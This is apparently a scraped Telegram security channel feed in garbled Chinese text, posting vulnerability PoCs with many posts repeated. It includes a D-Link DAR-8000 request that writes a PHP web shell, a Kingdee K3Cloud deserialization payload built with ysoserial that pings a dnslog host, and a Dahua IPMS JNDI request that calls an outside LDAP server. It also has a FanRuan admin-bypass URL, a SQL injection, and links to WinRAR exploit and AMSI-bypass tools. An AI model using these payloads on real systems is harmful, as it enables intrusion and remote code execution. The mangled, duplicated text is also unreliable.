๐6โค3๐1
๐ฐ้ป็-๐ฉ๐๐๐๐ ๐ฉ๐ถ๐ฟ-่ตๆบๅ
ฌๅผ๐
ฅ๏ผๆฐๆฎ็ๆไปถ๏ผ
ๆ้ไบxssๆกไพ0822-7.pdf
ๅฏ็ :santiankejian.cves.io0822
โค6๐5
D-LINK-DAR-8000-10 ่ฟ็จๅฝไปคๆง่ก poc
https://xxx.xxx.xxx/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNDA2NTc2NjE2YzI4MjQ1ZjUyNDU1MTU1NDU1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiMjAzZjNlIGludG8gb3V0ZmlsZSAnL3Vzci9oZGRvY3MvbnNnL2FwcC9tb2R1bGUuY2xhc3MucGhwJw==
3.็ดๆฅ่ฎฟ้ฎshell
https://xxx.xxx.xxx/app/module.class.php?cmd=phpinfo();
https://xxx.xxx.xxx/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNDA2NTc2NjE2YzI4MjQ1ZjUyNDU1MTU1NDU1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiMjAzZjNlIGludG8gb3V0ZmlsZSAnL3Vzci9oZGRvY3MvbnNnL2FwcC9tb2R1bGUuY2xhc3MucGhwJw==
3.็ดๆฅ่ฎฟ้ฎshell
https://xxx.xxx.xxx/app/module.class.php?cmd=phpinfo();
โค2
ๅธ่ฝฏๆฅ่กจ็ณป็ป่ทๅ็ฎก็ๅๆ้
/ReportServer?op=fr_auth&cmd=ah_loginui&_=1619832545582
/ReportServer?op=fr_auth&cmd=ah_loginui&_=1619832545582
้่ถไบRCEๆผๆด poc
ๅฝฑๅๅนณๅฐ
6.x --> 6.2.1012.4
7.x --> 7.0.352.16ใ7.7.0.202111
8.x --> 8.0.0.202205ใ8.1.0.20221110
็ๆๅๅบๅๅpayload๏ผ
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "ping 8d51yv.dnslog.cn"
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: 192.168.0.110
User-Agent: Go-http-client/1.1
Content-Length: 2687
Content-Type: text/json
Accept-Encoding: gzip
{"ap0":"payload ๆฐๅผ","format":"3"}
ๅฝฑๅๅนณๅฐ
6.x --> 6.2.1012.4
7.x --> 7.0.352.16ใ7.7.0.202111
8.x --> 8.0.0.202205ใ8.1.0.20221110
็ๆๅๅบๅๅpayload๏ผ
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "ping 8d51yv.dnslog.cn"
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: 192.168.0.110
User-Agent: Go-http-client/1.1
Content-Length: 2687
Content-Type: text/json
Accept-Encoding: gzip
{"ap0":"payload ๆฐๅผ","format":"3"}
๐5โค1
winrar ไปฃ็ ๆง่ก๏ผ้ๅธธ็ฎๅ็ไธ้ฎๅฉ็จๅทฅๅ
ท
https://github.com/ignis-sec/CVE-2023-38831-RaRCE
https://github.com/ignis-sec/CVE-2023-38831-RaRCE
GitHub
GitHub - ignis-sec/CVE-2023-38831-RaRCE: An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831โฆ
An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831, WinRAR RCE before versions 6.23 - ignis-sec/CVE-2023-38831-RaRCE
๐4โค1
amsi ๆๆฐ็ป่ฟๆนๆณ
Windows ่ฟ็จ่ฐ่ฏๅจๆบๅถ็ป่ฟ AMSI ็ๅฆไธ็งๆนๆณ
https://github.com/MzHmO/DebugAmsi
Windows ่ฟ็จ่ฐ่ฏๅจๆบๅถ็ป่ฟ AMSI ็ๅฆไธ็งๆนๆณ
https://github.com/MzHmO/DebugAmsi
GitHub
GitHub - MzHmO/DebugAmsi: DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.
DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism. - MzHmO/DebugAmsi
โค1
(CVE-2023-2317) ๅบไบ Typora DOM ็่ทจ็ซ็น่ๆฌๅฏผ่ด่ฟ็จไปฃ็ ๆง่ก
Typora ๆฏไธๆฌพๆต่ก็่ทจๅนณๅฐ Markdown ็ผ่พๅจ๏ผๅ ่ฎธ็จๆทๅๅปบๅ็ผ่พๅ ทๆๅฎๆถ้ข่งๅ่ฝ็ Markdown ๆไปถ
https://starlabs.sg/advisories/23/23-2317/
Typora ๆฏไธๆฌพๆต่ก็่ทจๅนณๅฐ Markdown ็ผ่พๅจ๏ผๅ ่ฎธ็จๆทๅๅปบๅ็ผ่พๅ ทๆๅฎๆถ้ข่งๅ่ฝ็ Markdown ๆไปถ
https://starlabs.sg/advisories/23/23-2317/
STAR Labs
(CVE-2023-2317) Typora DOM-Based Cross-site Scripting leading to Remote Code Execution
Summary: Product Typora Vendor Typora Severity High Affected Versions Typora for Windows/Linux < 1.6.7 Tested Versions Typora for Windows 1.5.12, Typora for Linux 1.5.10 CVE Identifier CVE-2023-2317 CVE Description DOM-based XSS in updater/update.htmlโฆ
๐5โค2
Media is too big
VIEW IN TELEGRAM
AWS S3 httpๅผๆญฅ็ผๅญไธญๆฏPOC
ๅคงๅๆบๆ
งๅญๅบ็ปผๅ็ฎก็ๅนณๅฐ ipms ่ฟ็จไปฃ็ ๆง่กๆผๆด POC
POST /ipms/barpay/pay HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://xxxxx/Basic/TomcatEcho", "autoCommit": true}
POST /ipms/barpay/pay HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://xxxxx/Basic/TomcatEcho", "autoCommit": true}
โค1
ไบฟๅก้ update.jsp sql ๆณจๅ
ฅๆผๆด POC
GET http://1ip:port/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20D ELAY%20%270:0:2%27--
GET http://1ip:port/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20D ELAY%20%270:0:2%27--
๐1
้ๅฏน Docker ๅญๅจ็ๅจ่ๆผๆด่ฟ่ก็ๆด็็ฌ่ฎฐ
https://github.com/Antonlovesdnb/DockerDetectionNotes
https://github.com/Antonlovesdnb/DockerDetectionNotes
GitHub
GitHub - Antonlovesdnb/DockerDetectionNotes: Some of my rough notes for Docker threat detection
Some of my rough notes for Docker threat detection - Antonlovesdnb/DockerDetectionNotes
๐4โค1
#็ฆๅฉ #ๅทฅๅ
ท
https://github.com/tonikelope/megabasterd
่ฟ็ฉๆๅฏไปฅ็ป่ฟmega็ฝ็็ไธ่ฝฝ้ๅถ
https://github.com/tonikelope/megabasterd
่ฟ็ฉๆๅฏไปฅ็ป่ฟmega็ฝ็็ไธ่ฝฝ้ๅถ
GitHub
GitHub - tonikelope/megabasterd: Yet another unofficial (and ugly) cross-platform MEGA downloader/uploader/streaming suite.
Yet another unofficial (and ugly) cross-platform MEGA downloader/uploader/streaming suite. - tonikelope/megabasterd
๐2โค1
Forwarded from ่ธนๅๅ
ฌๅฏ
ไธไธช Pwn ไป 0 ๅฐ 0.1 ็่ชๅญฆๆๅ
Assembly-Language ๆฑ็ผ่ฏญ่จ
Reverse-Engineering ้ๅๅทฅ็จ
PWN Tools ๅๆๅทฅๅ ท
PWN You-just-got-pwned!
Reverse Tools ๅๆๅทฅๅ ท
Angr CTF ๅๅ ถ WriteUp
้พๆฅ๏ผhttps://pan.quark.cn/s/7a7b26010e18
Assembly-Language ๆฑ็ผ่ฏญ่จ
Reverse-Engineering ้ๅๅทฅ็จ
PWN Tools ๅๆๅทฅๅ ท
PWN You-just-got-pwned!
Reverse Tools ๅๆๅทฅๅ ท
Angr CTF ๅๅ ถ WriteUp
้พๆฅ๏ผhttps://pan.quark.cn/s/7a7b26010e18
pan.quark.cn
ๅคธๅ
็ฝ็ๅไบซ
ๅคธๅ
็ฝ็ๆฏๅคธๅ
ๆจๅบ็ไธๆฌพไบๆๅกไบงๅ๏ผๅ่ฝๅ
ๆฌไบๅญๅจใ้ซๆธ
็ๅงใๆไปถๅจ็บฟ่งฃๅใPDFไธ้ฎ่ฝฌๆข็ญใ้่ฟๅคธๅ
็ฝ็ๅฏ้ๆถ้ๅฐ็ฎก็ๅไฝฟ็จ็
ง็ใๆๆกฃใๆๆบ่ตๆ๏ผ็ฎๅๆฏๆAndroidใiOSใPCใiPadใ
่ฟท่ซๅคงๅญฆ็vsไปๆฅ็พไธ้ปไบงๅคดๅญ
๐28๐คก2โค1